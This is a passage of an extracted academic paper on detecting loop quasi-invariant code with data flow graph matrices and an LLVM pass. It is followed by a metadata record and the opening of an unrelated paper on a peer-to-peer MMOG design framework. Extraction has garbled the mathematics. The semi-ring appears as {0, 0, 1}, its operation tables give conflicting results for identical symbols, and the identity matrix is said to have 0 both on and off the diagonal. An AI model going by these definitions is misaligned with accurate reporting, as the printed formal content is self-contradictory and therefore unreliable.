of arrows ending on the right occurrence of z. Figure 2 illustrates these types of dependencies; let us stress here that the DFG would be the same if the assignment \( y = y \) were to be removed from C since the value of y is still propagated. More formally, a DFG of a command C is a triple \((V, \mathcal{R}_{dep}, \mathcal{R}_{prop})\) with V the variables involved in the command C and a pair of two relations on the set of variables. These two relations express how the values of the involved variables after the execution of the command depend on their values before the execution. There is a direct dependence between variables appearing in an expression and the variable on the left-hand side of the assignment. For instance \( x \) directly depends on \( y \) and \( z \) in the statement \( x = y + z \). When variables are unchanged by the command we call it propagation. Propagation only happens when a variable is not affected by the command, not when it is copied from another variable. If the variable is set to a constant, we call this a reinitialization. More technically, we will work with an alternative representation in terms of matrices. While less intuitive, this allows for more natural compositions, based on standard linear algebra operations. Before providing the formal definition, let us introduce the semi-ring \(\{0, 0, 1\}\): the addition \(\oplus\) and multiplication \(\otimes\) are defined in Figure 3. Let us remark that, identifying 0 as \(-\infty\), this is a sub-semi-ring of the standard tropical semi-ring, with \(\oplus\) and \(\otimes\) interpreted as max and + respectively. \[ \begin{array}{c|ccc} \oplus & 0 & 0 & 1 \\ \hline 0 & 0 & 0 & 1 \\ 0 & 0 & 0 & 1 \\ 1 & 1 & 1 & 1 \\ \end{array} \quad \begin{array}{c|ccc} \otimes & 0 & 0 & 1 \\ \hline 0 & 0 & 0 & 0 \\ 0 & 0 & 0 & 1 \\ 1 & 0 & 1 & 1 \\ \end{array} \] Figure 3: Addition and Multiplication in the semi-ring \(\{0, 0, 1\}\). Definition 1 A Data Flow Graph for a command C is a \(n \times n\) matrix over the semi-ring \(\{0, 0, 1\}\) where n is the number of variables involved in C. We write \(M(C)\) the DFG of C. At line i, column j, we have a 0 if the output value of the jth variable does not depend on the input value of the ith; a 0 in case of propagation (unmodified variable); and a 1 for any other kind of dependence. \(^2\)Note that \(y = y\) does not create a direct dependence Definition 2 Let $C$ be a command. We define $\text{In}(C)$ (resp. $\text{Out}(C)$) as the set of variables used (resp. modified) by $C$. Note that $\text{In}(C)$ and $\text{Out}(C)$ are exactly the set of variables that are at either ends of the “dependence” arrows. 2.2 Constructing DFGs We now describe how the DFG of a command can be computed by induction on the structure of the command. Base cases (skip, use and assignment) are done in the obvious way, generalising slightly the definitions of DFGs shown in Figure 2. 2.2.1 Composition and Multipath We now turn to the definition of the DFG for a (sequential) composition of commands. This abstraction allows us to see a block of statements as one command with its own DFG. Definition 3 Let $C$ be a sequence of commands $[C_1; C_2; \ldots; C_n]$. Then $M(C)$ is defined as the matrix product $M(C_1)M(C_2)\ldots M(C_n)$. Following the usual product of matrices, the product of two matrices $A, B$ is defined here as the matrix $C$ with coefficients: $$C_{i,j} = \bigoplus_{k=1}^n (A_{i,k} \otimes B_{k,j}).$$ This operation of matrix multiplication corresponds to the computation of multipaths in the graph representation of DFGs. We illustrate this intuitive construction on an example in Figure 4. Figure 4: DFG of Composition. Here $C_1 := [w = w + x; z = y + 2;]$ and $C_2 := [x = y; z = z \ast 2;]$ 2.2.2 Condition We now explain how to compute the DFG of a command $C := \text{if } E \text{ then } C_1;$, from the DFG of the command $C_1$. Firstly, we notice that in $C$, all modified variables in $C_1$, i.e. in $\text{Out}(C_1)$, will depend on the variables used in $E$. Let us denote by $M(C_1)^E$ the corresponding DFG, i.e. the matrix $M(C_1) \oplus (E'O)$, where $E$ (resp. $O$) is the vector representing variables in $\text{Var}(E)$ (resp. in $\text{Out}(C_1)$), and $(\cdot)^t$ denotes the transpose. Secondly, we need to take into account that the command $C_1$ may be skipped. In that case, the overall command $C$ should act as an empty command, i.e. be represented by the identity matrix $\text{Id}$ (diagonal elements are equal to 0, all other are equal to 0). Finally, the DFG of a conditional will be computed by summing these two possibilities, as in Figure 5. Definition 4 Let $C$ be a command of the form $\text{if } E \text{ then } C_1;$. Then $M(C) = M(C_1)^E \oplus \text{Id}$. --- 3I.e. the vector with a coefficient equal to 1 for the variables in $\text{Var}(E)$, and 0 for all others variables. Finally, let us define the DFG of a command $C$ of the form $C := \text{while } E \text{ do } C_1;$. This definition splits into two steps. First, we define a matrix $M(C_1)$ representing iterations of the command $C_1$; then we deal with the condition of the loop in the same way we interpreted the conditional above. When considering iterations of $C_1$, the first occurrence of $C_1$ will influence the second one and so on. Computing the DFG of $C_{1}^{n}$, the $n$-th iteration of $C_1$, is just computing the power of the corresponding matrix, i.e. $M(C_{1}^{n}) = M(C_1)^n$. But since the number of iteration cannot be decided a priori, we need to add all possible values of $n$. The following expression then expresses the DFG of the (informal) command $C_1^*$ corresponding to "iterating $C_1$ a finite (but arbitrary) number of times": $$M(C_1^*) = \lim_{k \to \infty} \bigoplus_{i=1}^{k} M(C_1)^i$$ To ease notations, we note $M(C_1^{(k)})$ the partial summations $\sum_{i=1}^{k} M(C_1)^i$. Since the set of all relations is finite and the sequence $(M(C_1^{(k)}))_{k \geq 0}$ is monotonous, this sequence is eventually constant. I.e., there exists a natural number $N$ such that $M(C_1^{(k)}) = M(C_1^{(N)})$ for all $k \geq N$. One can obtain the following bound on the value of $N$. **Lemma 1** Consider a command $C$ and define $K = \min(i,o)$, where $i$ (resp. $o$) denotes the number of variables in $\text{In}(C)$ (resp. $\text{Out}(C)$). Then, the sequence $(M(C^{(k)}))_{k \geq K}$ is constant. Figure 6 illustrates the computation of $\cdot^*$. The second step then consists in dealing with the loop condition, using the same constructions as for conditionals. **Definition 5** Let $C$ be a command of the form $\text{while } E \text{ do } C_1;$. Then $M(C) = M(C_1)^{[E]}$. 2.3 Independence Our purpose is to move commands around: exchange them, but more importantly to pull them out of loops when possible. We allow these moves only when semantics are preserved: to ensure this is the case, we describe a notion of independence. **Definition 6** If $\text{Out}(C_1) \cap \text{In}(C_2) = \emptyset$ then $C_2$ is independent from $C_1$. This is denoted $C_1 \prec C_2$. It is important to notice that this notion is not symmetric. As an example, let us consider Figure 7: Here, $C_2$ is independent from $C_1$ but the inverse is not true. ![Figure 7: Composition of independent chunks of commands](image) A particular case is self-independence, i.e. independence of a command w.r.t. itself. In that case, we can find non-trivial program transformations preserving the semantics. We denote by $[C] \equiv [D]$ the relation "$C$ and $D$ have the same semantics". **Lemma 2 (Specialization for while)** If $C_1$ is self-independent and $\text{Var}(E) \cap \text{Out}(C_1) = \emptyset$: $[\text{while } E \text{ do } C_1] \equiv [\text{if } E \text{ then } C_1; \text{while } E \text{ do } \text{skip}]$ Remark that we need to keep the loop while with a skip statement inside because we need to consider an infinite loop if $E$ is always true to keep the semantic equivalent. In general, we will consider mutual independence. **Definition 7** If $C_2 \prec C_1$ and $C_1 \prec C_2$, we say that $C_2$ and $C_1$ are mutually independents, and write $C_1 \bowtie C_2$. While independence in one direction only, such as in the example above, does not imply that $C_1; C_2$ and $C_2; C_1$ have the same semantics, mutual independence allows to perform program transformation that do not impact the semantics. **Lemma 3 (Swapping commands)** If $C_1 \bowtie C_2$, then $[C_1; C_2] \equiv [C_2; C_1]$ **Lemma 4 (Moving out of while loops)** If $C_1$ is self-independent (i.e. $C_1 \bowtie C_1$), and if $C_1 \bowtie C_2$, then: $[\text{while } E \text{ do } [C_1; C_2]] \equiv [\text{if } E \text{ then } C_1; \text{while } E \text{ do } C_2]$ Based on those lemmas, we can decide that an entire block of statement is invariant or quasi-invariant in a loop by computing the DFGs. The quasi-invariance comes with an invariance degree which is the number of time the loop needs to be peeled to be able to hoist the corresponding invariant. We can then implement program transformations that reduce the overall complexity while preserving the semantics. 3 In practice This section explains how we implemented the pass which computes the invariance degree and gives the main idea of how the transformation can be performed. In the previous Section, we have seen that the transformation is possible from and to a WHILE language; and from a previous implementation\(^4\) we have shown it can be done on C Abstract Syntax Trees. Compilers, and especially LLVM on which we are working, use an Intermediate Representation to handle programs. This is an assembly-like language that is used during all the stages of the compilation. Programs (in various different languages) are first translated into the IR, then several optimisations are performed (implemented in so-called passes), and finally the resulting IR is translated again in actual assembly language depending on the machine it will run on. Using a common IR allows to do the same optimisations on several different source languages and for several different target architectures. One important feature of the LLVM IR is the Single Static Assignment form (SSA). A program is in SSA form if each variable is assigned at most once. In other words, setting a program in SSA form requires a massive \(\alpha\)-conversion of all the variables to ensure uniqueness of names. The advantages are obvious since this removes any name-aliasing problem and ease analysis and transformation. The main drawback of SSA comes when several different paths in the Control Flow reach the same point (typically, after a conditional). Then, the values used after this point may come from any branch and this cannot be statically decided. For example, if the original program is if (y) then x:=0 else x:=1; C, it is relatively easy to turn it into a pseudo-SSA form by \(\alpha\)-converting the x: if (y) then x\(_0\):=0 else x\(_1\):=1; C but we do not know in C which of x\(_0\) or x\(_1\) should be used. SSA solves this problem by using \(\varphi\)-functions that, at runtime, can choose the correct value depending on the path just taken. That is, the correct SSA form will be if (y) then x\(_0\):=0 else x\(_1\):=1; X:=\(\varphi\)(x\(_0\), x\(_1\)); C. While the SSA itself eases the analysis, we do have to take into account the \(\varphi\) functions and handle them correctly. 3.1 Preliminaries First, we want to visit all loops using a bottom-up strategy (the inner loop first). Then, as for the Loop Invariant Code Motion (LICM) pass, our pass is derived from the basic LoopPass. Which means that each time a loop is encountered, our analysis is performed. At this point, the purpose is to gather the relations of all instructions in the loop to compose them and provide the final relation for the current loop. We decided to define a Relation object by three SmallPtrSet of Value*, listing the variables, the propagations and the initializations. Furthermore we represent the dependencies by a DenseMap of Value* to SmallPtrSet<Value*>. This way of representing our data is not fixed, it's certainly optimizable, but we think it's sufficient for our prototype analysis and examples. We will discuss the cost of this analysis later. Then a Relation is generated for each command using a top-down strategy following the dominance tree. The SSA form helps us to gather dependence information on instructions. By visiting operands of each assignment, it's easy to build our map of Relation. With all the current loop's relations gathered, we compute the compositions, condition corrections and the maximums relations possible as described previously. Obviously this method can be enhanced by an analysis on bounds around conditional and number of iterations for a loop. Finally, with those composed relations we compute an invariance degree for each statement in the loop. \(^4\)https://github.com/ThomasRuby/LQICM_On_C_Toy_Parser The only chunks considered in the current implementation are the one consisting of while or if-then-else statements. ### 3.2 Invariance degree computation In this part, we will describe an algorithm – using the previous concepts – to compute the invariance degree of each quasi-invariant in a loop. After that, we will be able to peel the loop at once instead of doing it iteratively. To simplify and as a recall, Figure 8 shows a basic example of peeled loop. The invariance degrees are given as comment after each Quasi-Invariant statements. So \( b = y + y \) is invariant of degree equal to one because \( y \) is invariant, that means it could be hoisted directly in the preheader of the loop. But \( b \) is used before, in \( b = b + 1 \), so it’s not the same \( b \) at the first iteration. We need to isolate this case by peeling one time the entire loop to use the first \( b \) computed by the initial \( b \). If \( b = y + y \) is successfully hoisted, then \( b \) is now invariant. So we can remove \( b = b + 1 \) but we need to do it at least one time after the first iteration to set \( b \) to the new and invariant value. This is why the loop is peeled two times. The first time, all the statements are executed. The second time, the first degree invariants are removed. The main work is to compute the proper invariance degree for each statement and composed statements. This can be done statically using the dependency graph and dominance graph. Here is the algorithm. Let suppose we have computed the list of dependencies for all commands in a loop. **Data:** Dependency Graph and Dominance Graph **Result:** List of invariance degree for each statement **Initialize degrees of use to \( \infty \) and others to 0;** **for each statement s do** \[ \text{if the current degree } cd \neq 0 \text{ then} \] \[ \text{skip} \] \[ \text{else} \] \[ \text{Initialize the current degree } cd \text{ to } \infty; \] \[ \text{if there is no dependence for the current chunk then} \] \[ cd = 1; \] \[ \text{else} \] \[ \text{for each dependence compute the degree } dd \text{ of the command do} \] \[ \text{if } cd \leq dd \text{ and the current command dominates this dependence then} \] \[ cd = dd + 1 \] \[ \text{else} \] \[ cd = dd \] \[ \text{end} \] \[ \text{end} \] \[ \text{end} \] **end** **Algorithm 2:** Invariance degree computation. This algorithm is dynamic. It stores progressively each degree needed to compute the current one and reuse them. Note that, for the initialization part, we are using LLVM methods (canSinkOrHoist, isGuaranteedToExecute etc...) to figure out if an instruction is movable or not. These methods provide the anchors instructions for the current loop. Loop Quasi-Invariant Chunk Motion ```c 0 while (x < 100) { 0 if (x < 100) //1 1 b = b + 1; //2 1 b_1 = b + 1; 2 use (b); 2 use (b_1); 3 x = x + 1; 3 x = x + 1; 4 b = y + y; //1 4 b = y + y; 5 use (b); 5 use (b); 6 } 6 use (b); ``` Figure 8: Example: Hoisting twice. ### 3.3 Peeling loop idea The transformation will consist in creating as many preheaders basic blocks before the loop as needed to remove all quasi-invariants out of the loop. Each preheader will have the same condition as the .cond block of the loop and will contain the incrementation of the iteration variable. The maximum invariance degree is the number of time we need to peel the loop. So we can create as many preheaders before the loop. For each block created, we include every commands with a higher or equal invariance degree. For instance, the first preheader block will contain every commands with an invariance degree higher or equal to 1, the second one, higher or equal to 2 etc... and the final loop will contain every commands with an invariance degree equal to ∞. ### 4 Conclusion and Future work Developers expect that compilers provide certain more or less “obvious” optimizations. When peeling is possible, that often means: either the code was generated; or the developers prefer this form (for readability reasons) and expect that it will be optimized by the compiler; or the developers haven’t seen the possible optimization (mainly because of the obfuscation level of a given code). Our generic pass is able to provide a reusable abstract dependency graph and the quasi-invariance degrees for further loop optimization or analysis. In this example (Figure 9), we compute the same factorial several times. We can detect it statically, so the compiler has to optimize it at least in `-O3`. Our tests showed that is done neither in LLVM nor in GCC (we also tried `–fpeel_loops` with profiling). The generated assembly shows the factorial computation in the inner loop. Moreover, the computation time of this kind of algorithm compiled with clang in `-O3` still computes n times the inner loop so the computation time is quadratic, while hoisting it result in linear time. For the example shown in Figure 9, our pass computes the degrees shown in Figure 11 (where -1 represents a degree of ∞, that is an instruction that cannot be hoisted). ```c srand(time(NULL)); int n = rand() %10000; int j = 0; while(j < n){ fact = 1; i = 1; while (i <= n) { fact = fact * i; i = i + 1; } j = j + 1; use(fact); } ``` Figure 9: Hoisting inner loop ```c srand(time(NULL)); int n = rand() % 10000; int j = 0; if (j < n) { fact = 1; i = 1; while (i <= n) { fact = fact * i; i = i + 1; } j = j + 1; use(fact); } while (j < n) { j = j + 1; use(fact); } ``` Figure 10: LLVM Intermediate Representation Loop Quasi-Invariant Chunk Motion ---- MapDeg of while.cond3 ---- %mul = mul nsw i32 %fact.1, %i.1 = -1 %add = add nsw nsw i32 %i.1, 1 = -1 ------------------- ---- MapDeg of while.cond ---- %fact.0 = phi i32 [ 1, %while.body ], ..., = 1 %i.1 = phi i32 [ 1, %while.body ], ..., = 1 inner loop starting with while.cond3: = 1 %fact.0.lcssa = phi i32 [ %fact.0, %while.cond3 ] = -1 %i.1.lcssa = phi i32 [ %i.1, %while.cond3 ] = -1 %call7 = call ... i32 %i.1.lcssa, i32 %fact.0.lcssa) = -1 %add8 = add nsw nsw i32 %j.0, 1 = -1 ------------------- Figure 11: Invariance Degree To each instruction printed corresponds an invariance degree. The assignment instructions are listed by loops, the inner loop (starting with while.cond3) and the outer loop (starting with while.cond). The inner loop has its own invariance degree equal to 1 (line 9). Remark that we do consider the phi initialization instructions of an inner loop. Here %fact.0 and %i.1 are reinitialized in the inner loop condition block. So phi instructions are analysed in two different cases: to compute the relation of the current loop or to give the initialization of a variable sent to an inner loop. Our analysis only takes the relevant operand regarding to the current case and do not consider others. The code of this pass is available online. To provide some real benchmarks on large programs we need to implement the transformation. We are currently implementing this second pass on LLVM. Acknowledgments The authors wish to thank L. Kristiansen for communicating a manuscript that initiated the present work. Jean-Yves Moyen is supported by the European Commission’s Marie Skłodowska-Curie Individual Fellowship (H2020-MSCA-IF-2014) 655222 - Walgo; Thomas Rubiano is supported by the ANR project “Elica” ANR-14-CE25-0005; Thomas Seiller is supported by the European Commission’s Marie Skłodowska-Curie Individual Fellowship (H2020-MSCA-IF-2014) 659920 - ReACT. References https://github.com/ThomasRuby/lqicm_pass
{"Source-Url": "https://static-curis.ku.dk/portal/files/178883921/Moyen_2017_Loop_quasi_invariant.pdf", "len_cl100k_base": 8034, "olmocr-version": "0.1.53", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 45473, "total-output-tokens": 9893, "length": "2e12", "weborganizer": {"__label__adult": 0.0004725456237792969, "__label__art_design": 0.0003592967987060547, "__label__crime_law": 0.0004620552062988281, "__label__education_jobs": 0.0005154609680175781, "__label__entertainment": 8.255243301391602e-05, "__label__fashion_beauty": 0.0002111196517944336, "__label__finance_business": 0.00021970272064208984, "__label__food_dining": 0.0005478858947753906, "__label__games": 0.000782012939453125, "__label__hardware": 0.001476287841796875, "__label__health": 0.0009508132934570312, "__label__history": 0.0002930164337158203, "__label__home_hobbies": 0.00014090538024902344, "__label__industrial": 0.0006251335144042969, "__label__literature": 0.0003371238708496094, "__label__politics": 0.0004153251647949219, "__label__religion": 0.0007486343383789062, "__label__science_tech": 0.044036865234375, "__label__social_life": 9.91225242614746e-05, "__label__software": 0.00382232666015625, "__label__software_dev": 0.94189453125, "__label__sports_fitness": 0.0004665851593017578, "__label__transportation": 0.0008435249328613281, "__label__travel": 0.0002582073211669922}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 33406, 0.04356]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 33406, 0.68833]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 33406, 0.85182]], "google_gemma-3-12b-it_contains_pii": [[0, 901, false], [901, 4063, null], [4063, 7688, null], [7688, 10232, null], [10232, 13330, null], [13330, 15836, null], [15836, 17640, null], [17640, 20121, null], [20121, 23948, null], [23948, 26727, null], [26727, 29098, null], [29098, 29631, null], [29631, 32451, null], [32451, 33406, null]], "google_gemma-3-12b-it_is_public_document": [[0, 901, true], [901, 4063, null], [4063, 7688, null], [7688, 10232, null], [10232, 13330, null], [13330, 15836, null], [15836, 17640, null], [17640, 20121, null], [20121, 23948, null], [23948, 26727, null], [26727, 29098, null], [29098, 29631, null], [29631, 32451, null], [32451, 33406, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 33406, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 33406, null]], "pdf_page_numbers": [[0, 901, 1], [901, 4063, 2], [4063, 7688, 3], [7688, 10232, 4], [10232, 13330, 5], [13330, 15836, 6], [15836, 17640, 7], [17640, 20121, 8], [20121, 23948, 9], [23948, 26727, 10], [26727, 29098, 11], [29098, 29631, 12], [29631, 32451, 13], [32451, 33406, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 33406, 0.0]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
81ed6da3d38b5cb26abf1f2d71e9f99b8cd2bf3c
Heriot-Watt University Mediator Fan, Lu; Taylor, Hamish; Trinder, Phil Published in: Proceedings of the 6th ACM SIGCOMM Workshop on Network and System Support for Games, NetGames '07 DOI: 10.1145/1326257.1326265 Publication date: 2007 Document Version Early version, also known as pre-print Link to publication in Heriot-Watt Research Gateway Citation for published version (APA): General rights Copyright and moral rights for the publications made accessible in the public portal are retained by the authors and/or other copyright owners and it is a condition of accessing publications that users recognise and abide by the legal requirements associated with these rights. If you believe that this document breaches copyright please contact us providing details, and we will remove access to the work immediately and investigate your claim. Mediator: A Design Framework for P2P MMOGs Lu Fan School of Mathematical and Computer Sciences Heriot-Watt University, Edinburgh, UK lf16@hw.ac.uk Hamish Taylor School of Mathematical and Computer Sciences Heriot-Watt University, Edinburgh, UK h.taylor@hw.ac.uk Phil Trinder School of Mathematical and Computer Sciences Heriot-Watt University, Edinburgh, UK p.w.trinder@hw.ac.uk ABSTRACT With widespread use of the Internet, Massively Multiplayer Online Games (MMOGs) are becoming increasingly popular. As MMOGs scale up, conventional Client/Server (C/S) architectures exhibit various drawbacks in scalability, reliability, and redundancy. This paper presents a new Peer-to-Peer (P2P) MMOG design framework, Mediator, using a super-peer network with multiple super-peer (Mediator) roles. Mediator is novel in integrating four elements: a reward scheme, distributed resource discovery, load-management and super-peer selection. The reward scheme differentiates a peer’s contribution from their reputation, and pursues symmetrical reciprocity as well as discouraging misdeeds. A deadline-driven auction protocol is proposed for distributed resource discovery. Furthermore, both common-peer and super-peer workloads are approximately balanced using a two-level load-management scheme, and super-peers are selected in a flexible policy-based way. In this framework, the functionalities of a traditional game server are distributed, capitalising on the potential of P2P networks, and enabling the MMOG to scale better in both communication and computation. A proof-of-concept prototype of this framework is described, and ongoing work is discussed. 1. INTRODUCTION A MMOG allows thousands of players to interact simultaneously in a persistent game world over a network. With widespread use of the Internet, MMOGs are becoming increasingly popular. A recent survey [15] indicates how the number of MMOG subscribers have been increasing at a fast growing rate. Traditionally, MMOGs have been implemented as C/S systems, which offers advantages such as centralised control, better security and simplicity of implementation. Though this widely used architecture is suitable for many types of distributed applications, it still suffers from technical and commercial drawbacks: 1) Scalability - The performance of central game servers is a bottleneck that put a limit on the total number of players a game can accommodate. 2) Redundancy - To ensure that the performance of a game server is powerful enough to handle peak usage rates, may result in high hardware redundancy. 3) Reliability - The C/S architecture is not very fault tolerant since servers are single points of failure. 4) Cost - It takes 2 to 3 years and about 10 million dollars to launch a medium-sized MMOG, and ongoing support costs consume up to 80% of its revenues [8]. As discussed above, C/S architecture drawbacks undermine its ability to support large scale, sophisticated, interactive multiplayer online games, and thus much research effort has been put into the design and implementation of P2P MMOGs [6, 18, 3, 5, 16]. P2P architectures suggest a scalable and low cost way for building MMOGs. It enables individuals to deploy public domain MMOG software without the major investment required by previous architectures, and affords business opportunities for enterprises to market game services in a more flexible and profitable fashion, without providing a supporting hardware infrastructure and dedicated maintenance staff. P2P MMOGs have begun to attract significant academic attention since the early 2000s. Substantial research work has been carried out to address issues like game event dissemination [3, 5, 16], interest management [18, 1], and game state persistency [6, 2]. Though many important issues have been clarified and solved to some extent, little work has been published on the distributed hosting of game objects. As of June 2006, 97.6% of the deployed MMOGs fell into the MMO RPG (Role-Playing Game) category, and only about 0.3% fell into MMO FPS (First-person Shooter) [15], which shows the relative importance of MMORPGs. One main difference between them is that the former involves considerable numbers of game objects (a.k.a. non-player characters, or NPCs) such as AI-controlled monsters. Traditionally, NPCs are hosted by a central game server, consuming significant processing power and network bandwidth, and thus account for a major part of the server’s workload. In order to support a MMORPG in a P2P network, a scheme is needed for hosting game objects using common game participants’ computing resources. This paper presents a design framework, which takes into consideration a reward-based distributed resource discovery and load-management scheme within super-peer networks, and aims at distributing the functionalities of a traditional game server. The rest of this paper is organized as follows. Section 2 is a brief survey of related work. Section 3 presents the overall design of the Mediator framework. Section 4 introduces a preliminary proof-of-concept prototype that is being built. Section 5 concludes and discusses future work. 2. RELATED WORK 2.1 Game Event Dissemination Game event dissemination has become a popular research topic, because the bandwidth reduction potential of a P2P network can remove C/S communication bottlenecks at the server side. Fiedler et al. were amongst the first to advocate splitting the game world of a P2P MMOG into smaller pieces and to apply a publisher/subscriber communication model to enhance the scalability of a MMOG [3]. With the publication of a number of P2P overlay infrastructures in the early 2000s, such as Chord [14], CAN [12], Pastry [13] and Tapestry [19], game event dissemination research started to head in two opposite directions. Unstructured approaches [5, 16] emphasised the dynamic grouping of peers, and argued that each peer only needs to establish limited direct P2P connections with neighbouring peers in the same group. In contrast, structured approaches [6, 18] proposed building P2P MMOGs over a P2P overlay infrastructure which provides advantages such as self-organization, scalable Distributed Hash Tables (DHT), efficient routing algorithms, and transparent reconfiguration after node failures. Generally speaking, a structured design can be broken down into three layers: 1) **Structured P2P Overlay Network** - In this layer, every peer is identified by a random Id generated by a hashing function, and a routing algorithm [14, 12, 13, 19] is employed to route a message from source to destination. 2) **Super-peer Network** - Within the P2P overlay, some peers are elected to be super-peers, which operate both as a server to a set of clients, and as an equal in a network of super-peers [17]. 3) **P2P MMOG Game Zones** - Every game zone is identified by a zone Id, which serves as a rendezvous point for the peers that play in that zone. The main difference between a peer Id and a zone Id is that the former is random and temporary, whereas the latter is static and well-known by all participants of the application. Most structured approaches accord with this layered structure, with some flexibilities, e.g. how and for what purpose a super-peer is elected. 2.2 Interest Management Interest Management (IM) is a classical research topic in Networked Virtual Environments (NVE), and was initially addressed by Morse et al. in the mid 1990s [16]. Various IM algorithms have been proposed in the literature, and their performances are compared in [1]. The MOPAR infrastructure [18] is representative of recent work on distributed IM, which is especially beneficial to the design and implementation of P2P MMOGs. Unlike previous related work, MOPAR relies on a hybrid communication scheme that combines a DHT and direct P2P connections. It is argued that though the DHT can facilitate the maintenance of the game zone structure, it will introduce a considerable amount of communication overhead. Instead, MOPAR devises a completely distributed IM algorithm, which requires each peer to establish direct P2P connections to a small quantity of other peers on demand, for exchanging time critical information. 2.3 Game State Persistency A MMOG is also called a Persistent World, because of the maintaining and developing of the game world around the clock. So, the problem “how is the persistent data stored, updated, and reloaded?” immediately presents itself to game architects who aim to deploy a P2P MMOG without a centralized game server. Scott et al. propose that the entire virtual world and the game logic be combined into an entity database distributed over all peers, and adopt an agent-based approach for efficient communication and processing among strongly interacting entities [2]. Takuji et al. propose a zoned federation model, in which a zone owner is elected in each zone and works in the same way as a centralized authoritative server while it is connected to the world [6]. 3. THE MEDIATOR FRAMEWORK 3.1 Overview The Mediator framework adopts a hybrid communication architecture - a structured P2P overlay is used in the peer bootstrapping process, application level multicast is used for efficient game zone structure maintenance, and direct P2P connections are established on demand for the dissemination of time critical events. Secondly, the framework adapts quadrant zoning of a single-realm MMOG to facilitate load-management based upon dynamic zoning, because rectangles are easy to divide and combine. Thirdly, similar to previous structured related work, peers are organized into a hierarchical super-peer network. However, a major novelty here is that multiple super-peer roles are used in each game zone to carry out various management tasks, and some super-peer roles may have multiple instances. A super-peer is also called a Mediator, and four preliminary Mediator roles have been chosen in the current design: 1) **Boot Mediator (BM)** - A BM is the peer whose peer Id is numerically closest to a zone Id in the P2P overlay, and it is responsible for handling bootstrapping messages. A BM works in a similar way to a Home Node in MOPAR. 2) **Resource Mediator (RM)** - A RM is a super-peer that is responsible for the distributed resource discovery and matchmaking job, whose working protocol is discussed in section 3.3. In each game zone, multiple RM instances may coexist and work in parallel. 3) **Interest-Management Mediator (IMM)** - As indicated by its name, an IMM is responsible for the interest-management job. Its working protocol is like but is more complex than a Master Node in MOPAR (details about the collaboration between the IMM and the RM are given in section 3.3). 4) **Zone Mediator (ZM)** - A ZM is responsible for the selection of other super-peers and for roughly balancing out the workload among multiple super-peer instances. Moreover, a ZM also monitors the working state of other super-peers within the game zone, and replaces failed super-peers with capable backups in good time. More details about the ZM working protocol are given in section 3.4. The contribution of the Mediator framework lies in providing a way of distributing the functionalities of a traditional game server in a P2P network, especially the hosting of non-player game objects, which is a significant issue but has been addressed by little related work. The framework is flexible and extensible. On the one hand, new Mediator roles can be easily introduced into the framework according to newly identified requirements, and on the other hand, the framework is compatible with various distributed anti-cheating, interest management, reputation management, and anti-free-riding algorithms. The Mediator framework comprises four sub-topics that are discussed from section 3.2 to 3.5. 3.2 Reward Scheme 3.2.1 Rationale of the reward scheme Well-known P2P applications, such as Napster, Gnutella and Bit torrent show that P2P systems are by nature voluntary resource sharing systems, in which there is always a tension between individual concerns and collective welfare. Due to this characteristic, Mediator adopts a pull-based scheduling strategy which is more appropriate for maintaining the viability of a P2P MMOG. In this case, a reward scheme is crucial to keep a record of the resources that a peer has contributed to the system, and accordingly, to entitle the peer to consume roughly equivalent resources from other peers. Thus, selfish peers can be identified and discouraged, and a sufficient level of resource sharing can be ensured to make use of the P2P application beneficial. 3.2.2 Design of the reward scheme Determining how contributors are rewarded raises two sub-issues: the quantification and the qualification of contributions. Firstly, Mediator quantifies contributions in two different ways. On the one hand, common peers can contribute their computing resources by pulling and hosting gaming objects. Such jobs come with a computational complexity, which can be measured, and a contributor rewarded in a per-job fashion. However, on the other hand, a Mediator’s workload may vary over time, so it is relatively harder to trace and measure. In this case, it is proposed to reward Mediators purely according to their hardware configuration and online time. Therefore, strong peers should be motivated to take Mediator jobs, as well as to stay online for a longer time. Secondly, because a contribution scheme is only an accounting mechanism that facilitates symmetrical reciprocity, it is inadequate in discouraging disadvantageous behaviour, e.g. a player pretends to have a stronger machine in order to earn more contribution points, but the machine is overloaded by excessive tasks and consequently degrades other players’ gaming experiences; or, a Mediator disconnects from the system abruptly, putting the system into an inconsistent state which takes much time and inconvenience to recover from. In this case, a reputation scheme becomes necessary for qualifying a peer’s resources and creditability. By tracking a peer’s historical behaviour, its overall manner towards P2P collaborations can be made accountable for its positive or negative contribution to the system. Thus, Mediator rewards contributors by both increasing their reputation score and their contribution points. The former is helpful to promote future “sales” of their resources, and the latter entitles them to consume equivalent resources from other peers. It is important to notice that the reputation and contribution scores can be used in various beneficial ways rather than only within the reward scheme, e.g. the resource discovery scheme described in the next section attempts to enhance the gaming experience, such as minimizing latency, of favourable peers with good reputation and high contribution scores. Currently, the Mediator framework recommends the EigenTrust reputation management algorithm [7] and the DCRC anti-free-riding algorithm [4] as possible implementations for the reward scheme. Though originally the two algorithms were designed for P2P file-sharing applications, they can be easily adapted and used in a P2P MMOG. 3.3 Distributed Resource Discovery 3.3.1 Condor-like opportunistic match-making Mediator adopts a Condor-like match-making approach for resource discovery, and represents both the available resources and the job requests using ClassAds [11]. Though, Condor and Mediator share being pull-based and opportunistic [11], a major difference is that the former is static and centralized, whereas the latter is dynamic, decentralized and features multiple 